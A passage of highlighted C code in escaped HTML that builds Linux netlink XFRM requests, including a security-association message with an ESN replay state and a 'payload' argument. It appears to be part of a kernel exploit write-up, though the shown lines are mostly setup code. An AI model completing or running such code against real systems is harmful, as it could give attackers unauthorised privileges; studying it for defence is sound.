class=\"crayon-v\">err<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-56\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-57\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">AF_NETLINK<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">SOCK_RAW<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">NETLINK_XFRM<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-58\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-59\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;socket&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-60\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-61\"><span
class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-62\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-63\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sockaddr_nl<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-64\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nl_family<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AF_NETLINK<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-65\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nl_pid<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* packet goes into the kernel *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-66\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nl_groups<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRMNLGRP_NONE<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* no need for multicast group *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-67\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-68\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-69\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">send_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nlmsghdr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-70\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-71\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-72\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sendto<\/span><span 
class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">nlmsg_len<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sockaddr<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-73\"><span class=\"crayon-h\">\t\t&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sockaddr_nl<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-74\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-75\"><span class=\"crayon-h\">\t\t<\/span><span 
class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;sendto&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-76\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-77\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-78\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-79\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-80\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-81\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-82\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">add_attr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nlmsghdr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">maxlen<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">type<\/span><span
class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">const<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">attrlen<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-83\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-84\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nlattr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">nl<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-85\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">NLA_LENGTH<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">attrlen<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-86\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-87\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">nl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">NLMSG_TAIL<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5bad57622f389003567142-88\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">nl<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">nla_type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-89\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">nl<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">nla_len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-90\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memcpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">NLA_DATA<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">nl<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">attrlen<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-91\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">nlmsg_len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">NLMSG_ALIGN<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">nlmsg_len<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-e\">NLA_ALIGN<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-92\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-93\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-94\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-95\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req_newsa<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-e\">build_sa_frame<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">unsigned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">u_int32_t <\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-96\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-97\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req_newsa<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-98\"><span 
class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">in_addr_t <\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">dst<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-99\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">xfrm_mark <\/span><span class=\"crayon-v\">mark<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-100\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xfrm_algo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-101\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xfrm_replay_state_esn<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">esn<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-102\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">size_t <\/span><span class=\"crayon-v\">esn_size<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-103\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-104\"><span 
class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">malloc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req_newsa<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-105\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-106\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;malloc&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-107\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-108\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-109\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-110\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span
class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRM_MSG_NEWSA<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-111\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_flags<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">NLM_F_REQUEST<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">NLM_F_CREATE<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">NLM_F_EXCL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-112\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">NLMSG_LENGTH<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xfrm_usersa_info<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-113\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-v\">lft<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">soft_byte_limit<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRM_INF<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-114\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">lft<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">hard_byte_limit<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRM_INF<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-115\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">lft<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">soft_packet_limit<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRM_INF<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-116\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">lft<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">hard_packet_limit<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRM_INF<\/span><span 
class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-117\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-m\">mode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRM_MODE_TUNNEL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-118\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">flags<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRM_STATE_ESN<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-119\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-120\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">inet_addr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">saddr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-121\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">dst<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">inet_addr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">daddr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-122\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-123\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">family<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AF_INET6<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-124\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-125\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/\/r-&gt;xsinfo.saddr.a4 = src;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-126\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/\/r-&gt;xsinfo.id.daddr.a4 = dst;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-127\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memcpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">saddr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">a6<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">saddr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-128\"><span class=\"crayon-h\">\t<\/span><span 
